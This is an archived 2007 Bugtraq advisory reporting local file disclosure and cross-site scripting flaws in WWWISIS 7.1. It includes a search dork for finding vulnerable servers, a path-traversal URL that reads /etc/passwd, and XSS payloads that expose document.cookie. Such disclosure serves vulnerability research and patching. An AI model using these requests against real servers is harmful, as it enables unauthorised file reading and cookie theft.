| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY122-F22F0E4C32E15A25EE70C79EE9C0@phx.gbl> Date: Tue, 16 Oct 2007 16:23:57 +0000 From: jose luis góngora fernández <sys-project@...mail.com> To: bugtraq@...urityfocus.com Subject: WWWISIS <= 7.1 (IsisScript) Multiple Vulnerabilities # WWWISIS <= 7.1 (IsisScript) Multiple Vulnerabilities # Download: # http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2 # Bug found by JosS / Jose Luis Góngora Fernández # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure # d0rk: powered by WWWISIS # Stop lammer # Local File Disclosure Vulnerability: http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file] http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd # Exploit In (XSS): http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e .... [ i,e ... ] it is the language of script # Cross Siting Scripting: <script>alert(document.cookie)</script> "><script>alert(document.cookie)</script> //---------------------------------------\\ Greetz To: All Hackers JosS! / Jose Luis Góngora Fernández _________________________________________________________________ Horóscopo, tarot, numerología... Escucha lo que te dicen los astros. http://astrocentro.msn.es/
Powered by blists - more mailing lists